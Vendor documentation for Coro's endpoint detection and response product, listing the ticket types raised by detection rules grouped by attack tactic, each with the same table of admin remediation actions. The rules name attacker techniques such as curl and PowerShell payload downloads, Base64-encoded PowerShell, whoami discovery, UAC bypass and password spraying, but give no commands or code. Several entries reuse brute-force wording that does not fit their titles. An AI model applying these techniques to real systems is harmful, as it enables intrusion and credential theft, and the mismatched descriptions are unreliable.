Ticket types for Endpoint Detection and Response (EDR)
Important
The tickets discussed in this article apply to devices running Windows or macOS Agents.
note
To view additional information about Coro tickets, see Using the Ticket Log.
Coro creates tickets when it detects malicious processes that match the following detection rules:
- Command and Control
- Credential Access
- Defense Evasion
- Discovery
- Execution
- Initial Access
- Persistence
- Privilege Escalation
Command and Control
Attackers use command and control techniques to control compromised devices, steal data, spread malware, or build botnets. They send commands and receive stolen data through command and control servers. Coro detects these activities and creates tickets for the following command and control rules:
Remote Access Tool Attack
Coro detects remote access tools on devices. Attackers often install and activate these tools covertly to gain unauthorized network access or expose private services. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
| Action | Outcomes |
|---|---|
| Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
| Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
| Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
| Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
| Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
| Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
| Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Suspicious Usage of a LOLBin
Coro detects Living Off The Land Binaries (LOLBins) on devices. Attackers exploit these legitimate system tools to download or execute malicious activity while mimicking normal system processes. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
| Action | Outcomes |
|---|---|
| Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
| Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
| Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
| Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
| Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
| Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
| Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Credential Access
Attackers use credential access techniques to steal or misuse login credentials and gain unauthorized access to data or devices. Coro detects these attempts and creates tickets for the following credential access rules:
- Brute force attempt using a non-existent username
- Repeated brute force attempts using wrong passwords
Brute force attempt using a non-existent username
Coro detects suspicious account activity on one or more devices. This activity suggests attempts to manipulate accounts or brute force user credentials, potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
| Action | Outcomes |
|---|---|
| Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
| Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
| Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
| Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
| Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
| Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
| Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Repeated brute force attempts using wrong passwords
Coro detects suspicious account activity on one or more devices. This activity suggests attempted account manipulation or brute force attacks targeting user credentials and potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
| Action | Outcomes |
|---|---|
| Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
| Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
| Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
| Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
| Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
| Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
| Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Defense Evasion
Attackers use defense evasion techniques to avoid detection and bypass security mechanisms. Coro detects these attempts and creates tickets for the following defense evasion rules:
Malicious UAC Bypass
Coro detects User Account Control (UAC) bypasses on devices. Attackers use UAC bypass techniques to gain elevated system privileges. Coro keeps the tickets open for admin user review and automatically closes them after 48 hours.
| Action | Outcomes |
|---|---|
| Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
| Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
| Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
| Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
| Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
| Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
| Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Execution of a renamed tool
Coro detects renamed tools on devices. Attackers use this masquerading technique to avoid detection. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
| Action | Outcomes |
|---|---|
| Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
| Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
| Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
| Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
| Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
| Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
| Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Discovery
Attackers use discovery techniques to gather information about the devices, networks, or infrastructure they’ve infiltrated. Coro detects these actions and creates tickets for the following discovery rules:
Unauthorized System Discovery Activity
Coro detects use of the whoami command on devices. Attackers often run this command during system discovery to identify user accounts and privileges. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
| Action | Outcomes |
|---|---|
| Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
| Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
| Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
| Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
| Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
| Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
| Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Execution
Attackers use execution techniques to run malicious code on target devices or networks. Coro detects these attempts and creates tickets for the following execution rules:
- Suspicious Usage of a LOLBin
- Malicious File Download and/or Execution
- Malicious PowerShell Download from External Source
- Malicious Base64-Encoded PowerShell Command Usage
Malicious File Download and/or Execution
Coro detects use of curl commands on devices. Attackers often use curl to download and remotely execute payloads, enabling discreet transfer and execution of malicious files. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
| Action | Outcomes |
|---|---|
| Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
| Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
| Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
| Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
| Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
| Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
| Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Malicious PowerShell Download from External Source
Coro detects PowerShell execution with signs of file download attempts on devices. Attackers often exploit PowerShell’s scripting capabilities to covertly download and execute malicious payloads. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
| Action | Outcomes |
|---|---|
| Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
| Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
| Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
| Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
| Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
| Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
| Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Malicious Base64-Encoded PowerShell Command Usage
Coro detects Base64-encoded PowerShell commands on devices. Attackers often use Base64 encoding to hide malicious scripts from detection tools. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
| Action | Outcomes |
|---|---|
| Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
| Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
| Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
| Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
| Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
| Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
| Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Initial Access
Attackers use initial access techniques to gain entry into a network or device. Coro detects these attempts and creates tickets for Remote Access Tool Attacks.
Persistence
Attackers use persistence techniques to maintain long-term control of a device or network, often stealthily. Coro detects these actions and creates tickets for the following persistence rules:
Malicious Scheduled Task Creation/Execution
Coro detects scheduled task creation or execution on devices, which might indicate that attackers are attempting to gain persistence or execute malicious code at predetermined times. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
| Action | Outcomes |
|---|---|
| Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
| Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
| Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
| Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
| Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
| Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
| Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Modification of User Accounts in Elevated Groups
Coro detects suspicious account activity on devices. This activity suggests attempted account manipulation or brute force attacks targeting user credentials, potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
| Action | Outcomes |
|---|---|
| Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
| Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
| Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
| Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
| Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
| Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
| Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Password spray attack involving 200 login attempts
Coro detects suspicious account activity on devices. This activity suggests attempted account manipulation or brute force attacks targeting user credentials, potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
| Action | Outcomes |
|---|---|
| Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
| Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
| Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
| Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
| Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
| Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
| Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Password spray attack involving 100 login attempts
Coro detects suspicious account activity on devices. This activity suggests attempted account manipulation or brute force attacks targeting user credentials, potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
| Action | Outcomes |
|---|---|
| Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
| Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
| Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
| Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
| Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
| Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
| Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |
Privilege Escalation
Attackers use privilege escalation techniques to gain higher-level permissions on a device or network after initial access. Coro detects these attempts and creates tickets for the following privilege escalation events:
Elevated group adding and removal
Coro detects suspicious account activity on devices. This activity suggests attempted account manipulation or brute force attacks targeting user credentials, potentially leading to unauthorized access. Coro keeps tickets open for admin user review and automatically closes them after 48 hours.
| Action | Outcomes |
|---|---|
| Close ticket | (Open tickets only) Closes the ticket and does not take any remediation action. Note: When a device is removed from protection, all open tickets associated with the device are automatically closed. |
| Re-open | (Closed tickets only) Reopens the ticket for admin user intervention and manual remediation. |
| Reboot devices | Reboots the affected device(s). For further information, see EDR Processes. |
| Shut down devices | Shuts down the affected device(s). For further information, see EDR Processes. |
| Un-log and remove from audit reports | (Closed tickets only) Removes the ticket from your workspace status update emails. Note: Use the Log and reference for audit reports action to re-include un-logged tickets in your update emails. |
| Block process | Blocks the execution of a process. Coro adds an entry to the EDR and Endpoint Security Blocked list. For further information, see Endpoint Security Allow/Block lists, Block proccesses, and EDR Processes. |
| Isolate affected devices from network | Used in the case of severe attacks. Coro isolates the affected device(s) from the network. An isolated device cannot communicate with resources on the network or the internet. Coro remains functional and communicates with the Coro server via a command prompt. For further information, see EDR Processes. |